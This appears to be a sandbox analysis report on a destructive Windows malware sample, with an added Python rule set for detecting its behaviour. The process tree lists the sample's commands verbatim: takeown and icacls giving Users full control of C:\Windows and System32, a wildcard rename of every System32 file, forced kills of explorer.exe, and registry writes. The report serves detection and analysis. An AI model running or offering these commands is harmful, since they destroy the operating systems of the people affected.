Analysis

  • max time kernel
    173s
  • max time network
    181s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    11-05-2022 22:42

General

  • Target

    38674f024ba7dbc7cc7a461d1b60b948ee7abbd5e81d26f25f991373cf196ad6.exe

  • Size

    865KB

  • MD5

    a11969b7f736f7613b76a2def8c51dbc

  • SHA1

    fa055058e2c1db2fb83ec6b7da9f1c41648889e3

  • SHA256

    38674f024ba7dbc7cc7a461d1b60b948ee7abbd5e81d26f25f991373cf196ad6

  • SHA512

    9ff92c00a0a78786a2222082e3a3452f9d20249844b10cfc774849ad49e56904d9eddb0b3d3b25106bfe741d84fa685b16e15745ba304aaaeb02854bbe3705ec

Score
8/10

Malware Config

Signatures

  • Possible privilege escalation attempt (8 IoCs)
  • Modifies file permissions (1 TTP, 8 IoCs)
  • Kills process with taskkill (2 IoCs)
  • Modifies registry key (1 TTP, 2 IoCs)
  • Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  • Suspicious use of AdjustPrivilegeToken (6 IoCs)
  • Suspicious use of FindShellTrayWindow (64 IoCs)
  • Suspicious use of SendNotifyMessage (5 IoCs)
  • Suspicious use of WriteProcessMemory (64 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\38674f024ba7dbc7cc7a461d1b60b948ee7abbd5e81d26f25f991373cf196ad6.exe
    "C:\Users\Admin\AppData\Local\Temp\38674f024ba7dbc7cc7a461d1b60b948ee7abbd5e81d26f25f991373cf196ad6.exe"
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1904
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\logonui.exe /v logon /t REG_SZ /d 'wscript.exe' /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3676
      • C:\Windows\SysWOW64\reg.exe
        reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\logonui.exe /v logon /t REG_SZ /d 'wscript.exe' /f
        3⤵
        • Modifies registry key
        PID:3180
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe /v explorer /t REG_SZ /d 'wscript.exe' /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3536
      • C:\Windows\SysWOW64\reg.exe
        reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe /v explorer /t REG_SZ /d 'wscript.exe' /f
        3⤵
        • Modifies registry key
        PID:4400
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c taskkill /f /im explorer.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1476
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im explorer.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:5012
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c icacls C:\Windows\System32 /Grant Users:F
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2240
      • C:\Windows\SysWOW64\icacls.exe
        icacls C:\Windows\System32 /Grant Users:F
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:4388
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c takeown /f C:\Windows\
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4304
      • C:\Windows\SysWOW64\takeown.exe
        takeown /f C:\Windows\
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:4500
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c icacls C:\Windows\ /Grant Users:F
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4804
      • C:\Windows\SysWOW64\icacls.exe
        icacls C:\Windows\ /Grant Users:F
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:5008
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c takeown /f C:\Windows\System32\
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2052
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ren C:\Windows\system32\*.* *.lolxxd
      2⤵
      PID:3068
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c taskkill /f /im explorer.exe
      2⤵
      PID:3628
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im explorer.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1072
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c takeown /f C:\Windows\System32\
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:320
      • C:\Windows\SysWOW64\takeown.exe
        takeown /f C:\Windows\System32\
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:3460
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c icacls C:\Windows\System32 /Grant Users:F
      2⤵
      PID:220
      • C:\Windows\SysWOW64\icacls.exe
        icacls C:\Windows\System32 /Grant Users:F
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:636
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c takeown /f C:\Windows\
      2⤵
      PID:1040
      • C:\Windows\SysWOW64\takeown.exe
        takeown /f C:\Windows\
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:4912
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c icacls C:\Windows\ /Grant Users:F
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3736
      • C:\Windows\SysWOW64\icacls.exe
        icacls C:\Windows\ /Grant Users:F
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:4700
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ren C:\Windows\system32\*.* *.lolxxd
      2⤵
      PID:2656

  • C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\System32\
    1⤵
    • Possible privilege escalation attempt
    • Modifies file permissions
    • Suspicious use of AdjustPrivilegeToken
    PID:3568
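The command lines in the process tree above are enough to build a first-pass triage rule set. The Python below is an added example for this page, not Triage's own detection logic: it runs the level-3 command lines from the Processes section (plus a few constructed benign lines that must stay quiet) through rules keyed to the report's signatures and tags each hit with the two ATT&CK IDs the matrix lists (T1222 for takeown/icacls, T1112 for reg add); the taskkill and wildcard-rename lines have no mapping in this report and are left unmapped. The system-directory pattern, the low-privilege principal list and the shell-process list are this example's assumptions. The IFEO rule also records what an analyst would note about the two reg add lines: the value written is named logon/explorer rather than Debugger, which is the only IFEO value that redirects process start, and the key path contains spaces without quotes, which reg.exe rejects as a syntax error. The sandbox signature only records that reg.exe was invoked; the report does not show whether the write succeeded, and even a successful write of those values would not have hijacked logonui.exe or explorer.exe.

```python
# Rule-based triage of the command lines shown in this report. Added example for this page,
# not Triage's detection logic. BENIGN_CMDLINES are constructed; SAMPLE_CMDLINES are from the report.
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

SAMPLE_CMDLINES = [  # level-3 lines from the Processes section (scan() also strips `cmd /c`)
    r"reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\logonui.exe /v logon /t REG_SZ /d 'wscript.exe' /f",
    r"reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe /v explorer /t REG_SZ /d 'wscript.exe' /f",
    r"taskkill /f /im explorer.exe",
    r"icacls C:\Windows\System32 /Grant Users:F",
    "takeown /f C:\\Windows\\",  # doubled backslashes: a raw string cannot end in a backslash
    "icacls C:\\Windows\\ /Grant Users:F",
    "takeown /f C:\\Windows\\System32\\",
    r"ren C:\Windows\system32\*.* *.lolxxd",
]
BENIGN_CMDLINES = [  # constructed, not from the report: ordinary admin work that must not fire
    r"icacls C:\Users\Admin\Documents\share /grant Users:RX",
    r"takeown /f C:\Users\Admin\Downloads\old.log",
    r'reg add "HKCU\Software\MyApp" /v Setting /t REG_SZ /d on /f',
    r"taskkill /f /im notepad.exe",
]


@dataclass
class Finding:
    rule: str
    technique: Optional[str]  # ATT&CK ID as listed in this report's matrix, else None
    cmdline: str
    note: str = ""


# Assumptions of this example: which paths, principals and processes count as sensitive.
_SYSTEM_DIR = re.compile(r"(?i)^[a-z]:\\windows(\\system32)?\\?$")
_LOW_PRIV = {"users", "builtin\\users", "everyone", "authenticated users"}
_SHELL_PROCS = {"explorer.exe"}
_IFEO = re.compile(r'(?i)^reg\s+add\s+("?)(HK\w+\\.*?\\Image File Execution Options\\([^\\"\s]+))\1(.*)$')


def _strip_wrapper(cmd: str) -> str:
    """Drop a leading `cmd /c` (bare or full path) so level-2 and level-3 lines are judged alike."""
    return re.sub(r'(?i)^\s*"?(?:[^\s"]*\\)?cmd(?:\.exe)?"?\s+/c\s+', "", cmd).strip()


def _is_system_dir(path: str) -> bool:
    return bool(_SYSTEM_DIR.match(path.strip('"')))


def _rule_takeown(cmd: str) -> Optional[Finding]:
    m = re.match(r'(?i)^takeown\s+/f\s+("[^"]+"|\S+)', cmd)
    if m and _is_system_dir(m.group(1)):
        return Finding("takeown on a system directory", "T1222", cmd,
                       f"ownership of {m.group(1)} transferred to the caller")
    return None


def _rule_icacls(cmd: str) -> Optional[Finding]:
    m = re.match(r'(?i)^icacls\s+("[^"]+"|\S+)\s+/grant(?::r)?\s+("[^"]+"|[^:\s]+):(\S+)', cmd)
    if not (m and _is_system_dir(m.group(1))):
        return None
    if m.group(2).strip('"').lower() in _LOW_PRIV and re.search(r"\bF\b", m.group(3).upper()):
        return Finding("full control on a system directory granted to a low-privileged group",
                       "T1222", cmd, f"{m.group(2)} gets F on {m.group(1)}")
    return None


def _rule_ifeo(cmd: str) -> Optional[Finding]:
    m = _IFEO.match(cmd)
    if not m:
        return None
    quoted, key, target, rest = m.groups()
    vm = re.search(r'(?i)/v\s+("[^"]+"|\S+)', rest)
    value = vm.group(1).strip('"') if vm else "(default)"
    notes = []
    if value.lower() != "debugger":  # only the Debugger value redirects process start
        notes.append(f"value name is {value!r}, not Debugger, so IFEO would not redirect {target}")
    if not quoted and " " in key:
        notes.append("key path has spaces but is unquoted; reg.exe takes the text after the first "
                     "space as extra arguments and fails with a syntax error")
    return Finding(f"IFEO key for {target} written", "T1112", cmd, "; ".join(notes))


def _rule_taskkill(cmd: str) -> Optional[Finding]:
    im = re.search(r'(?i)/im\s+("[^"]+"|\S+)', cmd)
    image = im.group(1).strip('"').lower() if im else ""
    if re.match(r"(?i)^taskkill\s", cmd) and re.search(r"(?i)\s/f(?=\s|$)", cmd) and image in _SHELL_PROCS:
        return Finding("forced kill of the desktop shell", None, cmd,
                       f"{image} terminated with /f; no ATT&CK mapping in this report")
    return None


def _rule_mass_rename(cmd: str) -> Optional[Finding]:
    m = re.match(r'(?i)^ren(?:ame)?\s+("[^"]+"|\S+?)\\\*\.\*\s+\*\.(\w+)', cmd)
    if m and _is_system_dir(m.group(1)):
        return Finding("wildcard rename of every file in a system directory", None, cmd,
                       f"extension changed to .{m.group(2)}; no ATT&CK mapping in this report")
    return None


_RULES = (_rule_takeown, _rule_icacls, _rule_ifeo, _rule_taskkill, _rule_mass_rename)


def scan(cmdlines: List[str]) -> List[Finding]:
    """Run every rule over every command line; findings keep input order."""
    return [f for raw in cmdlines for f in (r(_strip_wrapper(raw)) for r in _RULES) if f]


def summarize(findings: List[Finding]) -> Dict[str, int]:
    """Count findings per ATT&CK ID ('unmapped' where the report lists none)."""
    counts: Dict[str, int] = {}
    for f in findings:
        counts[f.technique or "unmapped"] = counts.get(f.technique or "unmapped", 0) + 1
    return counts
```

Running `scan(SAMPLE_CMDLINES)` yields one finding per line: four T1222 hits (two takeown, two icacls), two T1112 hits whose notes carry the Debugger and quoting caveats, and two unmapped hits for the explorer.exe kill and the `*.lolxxd` rename; `scan(BENIGN_CMDLINES)` returns nothing. Feeding the level-2 `cmd /c` lines instead gives the same result because the wrapper is stripped first.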

Network

MITRE ATT&CK Matrix (ATT&CK v6)

Defense Evasion

  • File Permissions Modification, T1222 (1)
  • Modify Registry, T1112 (1)


Downloads

  • memory/220-147-0x0000000000000000-mapping.dmp
  • memory/320-146-0x0000000000000000-mapping.dmp
  • memory/636-153-0x0000000000000000-mapping.dmp
  • memory/1040-148-0x0000000000000000-mapping.dmp
  • memory/1072-154-0x0000000000000000-mapping.dmp
  • memory/1476-132-0x0000000000000000-mapping.dmp
  • memory/2052-133-0x0000000000000000-mapping.dmp
  • memory/2240-134-0x0000000000000000-mapping.dmp
  • memory/2656-155-0x0000000000000000-mapping.dmp
  • memory/3068-144-0x0000000000000000-mapping.dmp
  • memory/3180-137-0x0000000000000000-mapping.dmp
  • memory/3460-150-0x0000000000000000-mapping.dmp
  • memory/3536-131-0x0000000000000000-mapping.dmp
  • memory/3568-139-0x0000000000000000-mapping.dmp
  • memory/3628-145-0x0000000000000000-mapping.dmp
  • memory/3676-130-0x0000000000000000-mapping.dmp
  • memory/3736-149-0x0000000000000000-mapping.dmp
  • memory/4304-135-0x0000000000000000-mapping.dmp
  • memory/4388-142-0x0000000000000000-mapping.dmp
  • memory/4400-138-0x0000000000000000-mapping.dmp
  • memory/4500-141-0x0000000000000000-mapping.dmp
  • memory/4700-151-0x0000000000000000-mapping.dmp
  • memory/4804-136-0x0000000000000000-mapping.dmp
  • memory/4912-152-0x0000000000000000-mapping.dmp
  • memory/5008-140-0x0000000000000000-mapping.dmp
  • memory/5012-143-0x0000000000000000-mapping.dmp